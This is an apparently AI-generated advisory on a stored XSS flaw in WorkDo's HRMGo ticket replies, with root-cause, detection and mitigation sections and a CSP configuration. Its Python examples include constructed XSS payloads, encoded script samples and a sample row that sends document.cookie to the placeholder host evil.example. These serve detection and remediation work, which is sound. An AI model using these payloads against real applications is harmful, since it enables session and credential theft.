CVE-2025-40975 Overview
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in WorkDo's HRMGo application. The vulnerability stems from the description parameter of POST requests to the /hrmgo/ticket/changereply endpoint being stored without validation and later rendered without output encoding. This allows an authenticated attacker to inject script that is persistently stored in the ticket reply and executed in the browser of every user who views it.
Critical Impact
Attackers can inject persistent malicious scripts into ticket replies, potentially compromising other users' sessions, stealing credentials, or performing unauthorized actions on behalf of victims.
Affected Products
- WorkDo HRMGo (Human Resource Management Application)
Discovery Timeline
- 2026-01-12 - CVE CVE-2025-40975 published to NVD
- 2026-01-13 - Last updated in NVD database
Technical Details for CVE-2025-40975
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) exists in WorkDo's HRMGo human resource management application. The application fails to properly sanitize or encode user-supplied input in the description parameter when handling ticket reply modifications. When an authenticated user submits a POST request to /hrmgo/ticket/changereply, the application stores the raw, unsanitized content in the database. This malicious content is then rendered without proper output encoding when other users view the ticket, causing the injected script to execute in their browser context.
Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server side, affecting all users who subsequently view the compromised content without requiring any direct interaction with the attacker.
Root Cause
The root cause of this vulnerability is missing output encoding, compounded by missing input validation, in the ticket reply functionality. The application does not validate the description parameter before storing it in the database, and it does not encode the content for the HTML context in which it is rendered back to users. This violates the principle of treating all user input as untrusted; the control that actually prevents execution is context-aware output encoding at render time, with input validation as defence in depth rather than a substitute.
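The flaw and its fix side by side, as an added example written for this page in Python rather than HRMGo's own code (the page does not show the vulnerable template, so the render functions, the surrounding HTML, and the sample payload are assumptions):

```python
"""Added illustration of CVE-2025-40975's root cause: a stored description is
concatenated into HTML verbatim (render_unsafe) versus encoded for the context
it lands in (render_safe, render_attribute_safe, render_js_safe).
Illustrative code, not HRMGo's; templates and names are assumptions."""
import html
import json

# Constructed sample of what an attacker could store via the description
# parameter of POST /hrmgo/ticket/changereply (not a real captured payload).
STORED_DESCRIPTION = '<img src=x onerror="alert(document.cookie)">'


def render_unsafe(description: str) -> str:
    """Reproduces the flaw: stored text goes into the HTML body unencoded,
    so the <img> tag and its onerror handler become live markup."""
    return f'<div class="reply-body">{description}</div>'


def render_safe(description: str) -> str:
    """Fix for an HTML body context: <, >, &, " and ' become entities, so the
    browser shows the payload as text instead of parsing it as a tag."""
    return f'<div class="reply-body">{html.escape(description, quote=True)}</div>'


def render_attribute_safe(description: str) -> str:
    """Fix for an attribute context: the value is entity-encoded AND the
    attribute is quoted, so the payload cannot break out of the attribute."""
    escaped = html.escape(description, quote=True)
    return f'<div class="reply-body" title="{escaped}"></div>'


def render_js_safe(description: str) -> str:
    """Fix for a JavaScript string context (reply handed to inline script):
    JSON-encode it, then additionally escape < and > so that a stored
    '</script>' cannot terminate the script block early."""
    encoded = json.dumps(description).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var reply = {encoded};</script>"


if __name__ == "__main__":
    print("vulnerable:", render_unsafe(STORED_DESCRIPTION))
    print("fixed     :", render_safe(STORED_DESCRIPTION))
    print("js context:", render_js_safe("</script><script>alert(1)</script>"))
```

Escaping everything is the right fix when the description is plain text. If HRMGo intends the field to carry rich text, escaping would mangle legitimate formatting; in that case the correct control is an allowlist HTML sanitizer applied on output (a maintained library, not a hand-written regex), still combined with encoding of every other insertion point.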
Attack Vector
The attack leverages network-based access, requiring the attacker to have authenticated access to the HRMGo application. The attacker crafts a malicious POST request to the /hrmgo/ticket/changereply endpoint, embedding JavaScript code within the description parameter. Once stored, any user viewing the ticket reply will have the malicious script execute in their browser session.
The attack requires low privileges (authenticated user access) and some user interaction (victim must view the affected ticket). Upon successful exploitation, attackers can potentially steal session tokens, redirect users to malicious sites, modify displayed content, or perform actions on behalf of the victim user.
Detection Methods for CVE-2025-40975
Indicators of Compromise
- Unusual JavaScript code patterns in ticket reply descriptions within the HRMGo database
- POST requests to /hrmgo/ticket/changereply containing script tags or JavaScript event handlers in the description parameter
- Unexpected outbound requests from users' browsers (for example to domains the organisation does not use, visible in proxy logs) immediately after a ticket reply page is loaded
- User reports of suspicious behavior when accessing the ticket system
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect and block common XSS payloads in POST requests to /hrmgo/ticket/changereply; treat this as a stopgap, since encoding and obfuscation bypasses of signature-based rules are routine
- Deploy a Content Security Policy (CSP) with a report-uri or report-to directive so that blocked inline script execution generates violation reports you can collect
- Monitor application logs for suspicious values in the description parameter; note that web servers do not log POST bodies by default, so this requires request-body logging at the application or reverse proxy
- Conduct regular database audits of the ticket reply table to identify stored XSS payloads, decoding HTML entities and URL encoding before matching so that obfuscated payloads are not missed
Monitoring Recommendations
- Enable detailed logging, including request bodies, for all POST requests to the /hrmgo/ticket/changereply endpoint
- Configure alerting for requests containing common XSS indicators such as <script>, javascript:, or event handlers like onerror and onload; normalise (URL-decode, possibly more than once, and HTML-unescape) the description value before matching, because the payload is rarely submitted in plain form
- Implement real-time monitoring of CSP violation reports to identify exploitation attempts
- Review web server access logs for anomalous activity patterns targeting the ticket functionality
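Detection logic matching the indicators above, as an added example written for this page and not vendor tooling; it also serves the database audit item under Detection Strategies and the "review and audit existing ticket replies" step in the mitigation section below. The log line format, the table row shape and all sample data are constructed assumptions, and evil.example is a placeholder domain:

```python
"""Added example: match the XSS indicators for CVE-2025-40975 against
request-body logs and stored ticket replies, after decoding the layers an
attacker can hide behind. Constructed format and data, not real HRMGo traffic."""
import html
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/hrmgo/ticket/changereply"

# Indicators from the monitoring recommendations: script tags, javascript:
# URLs, HTML event-handler attributes, plus a few other active-content tags.
INDICATORS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]


def normalize(value: str) -> str:
    """Undo URL encoding (including double encoding) and HTML entities,
    repeating until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = html.unescape(unquote_plus(value))
    return value


def find_indicators(text: str) -> list[str]:
    """Return the patterns that match the normalised text (empty list if clean)."""
    decoded = normalize(text)
    return [p.pattern for p in INDICATORS if p.search(decoded)]


# Assumed log format: method, path, source IP, then the raw URL-encoded POST body.
LOG_LINE = re.compile(r'^(?P<method>\w+) (?P<path>\S+) (?P<src>\S+) body="(?P<body>.*)"$')


def scan_request_log(lines) -> list[dict]:
    """Flag POSTs to the changereply endpoint whose description field matches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
            continue
        # Split on the raw '&' before decoding, so an encoded %26 inside a
        # value cannot be mistaken for a field separator.
        fields = dict(kv.split("=", 1) for kv in m["body"].split("&") if "=" in kv)
        matched = find_indicators(fields.get("description", ""))
        if matched:
            hits.append({"src": m["src"], "matched": matched})
    return hits


def audit_stored_replies(rows) -> list[int]:
    """Database audit: ids of reply rows whose description carries an indicator."""
    return [row["id"] for row in rows if find_indicators(row["description"])]


# Constructed sample data (not real traffic or database content).
SAMPLE_LOG = [
    'POST /hrmgo/ticket/changereply 10.0.0.5 body="id=12&description=Please+reset+my+badge"',
    'POST /hrmgo/ticket/changereply 10.0.0.9 body="id=12&description=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E"',
    # Double URL encoding wrapped around HTML entities: decodes to <script>alert(1)</script>.
    'POST /hrmgo/ticket/changereply 10.0.0.7 body="id=13&description=%2526lt%253Bscript%2526gt%253Balert%25281%2529%2526lt%253B%252Fscript%2526gt%253B"',
    'GET /hrmgo/ticket/12 10.0.0.9 body=""',
]
SAMPLE_ROWS = [
    {"id": 1, "description": "Laptop returned, ticket can be closed."},
    {"id": 2, "description": '<a href="javascript:fetch(\'//evil.example/?c=\'+document.cookie)">details</a>'},
]

if __name__ == "__main__":
    for hit in scan_request_log(SAMPLE_LOG):
        print("request hit:", hit)
    print("stored rows to review:", audit_stored_replies(SAMPLE_ROWS))
```

Run over real data, expect false positives from legitimate text (a reply containing the word "onload" followed by "=" would match); treat hits as triage candidates, not verdicts, and tune the indicator list to the application's own traffic.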
How to Mitigate CVE-2025-40975
Immediate Actions Required
- Review and audit existing ticket replies in the database for potentially malicious content
- Apply context-aware output encoding when rendering ticket reply content; this is the fix that prevents script execution regardless of what is stored
- Add input validation on the description parameter as defence in depth (restrict it to the formats the field actually needs); do not rely on input filtering alone, as it is routinely bypassed
- Consider temporarily restricting access to the ticket reply functionality until a patch is applied
Patch Information
Refer to the INCIBE Security Notice for official vendor guidance and patch availability. Organizations should contact WorkDo directly for updated versions that address this vulnerability.
Workarounds
- Implement a Web Application Firewall (WAF) with rules to filter XSS payloads in requests to the affected endpoint
- Deploy strict Content Security Policy (CSP) headers to prevent inline script execution; roll them out in Report-Only mode first, since HRMGo's own pages may rely on inline scripts that the policy would break
- Manually sanitize existing database entries in the ticket reply table to remove any stored malicious content
- Restrict access to the ticket system to trusted users until the vulnerability is patched
# Example Content Security Policy header configuration
# Add to web server configuration to help mitigate XSS impact.
# Stage it first as Content-Security-Policy-Report-Only with a report-uri, because
# the application may depend on inline scripts that script-src 'self' blocks.
# Apache (.htaccess or httpd.conf; requires mod_headers; "always" also sends the header on error responses)
Header always set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
# Nginx (nginx.conf; "always" also sends the header on error responses). Note that an
# add_header inside a location block replaces, rather than extends, headers inherited
# from the server block, so repeat it wherever other add_header directives exist.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

